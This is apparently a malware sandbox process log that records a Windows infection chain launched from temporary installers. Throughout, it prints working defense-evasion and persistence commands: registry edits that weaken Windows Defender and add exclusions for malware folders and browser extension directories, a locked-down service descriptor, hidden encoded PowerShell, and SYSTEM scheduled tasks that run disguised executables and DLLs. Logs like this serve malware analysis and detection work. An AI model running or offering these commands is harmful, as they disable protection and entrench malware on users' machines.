"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xd86038,0xd86044,0xd86050
C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3076 -ip 3076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1652
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe em /OQsite_idAGR 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMcnYgWbv" /SC once /ST 04:16:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMcnYgWbv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMcnYgWbv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 13:59:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe\" XT /rBsite_idGuS 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe XT /rBsite_idGuS 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DnXqKSf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml" /RU "SYSTEM"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:13:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll\",#1 /Fosite_idXfG 385118" /V1 /F
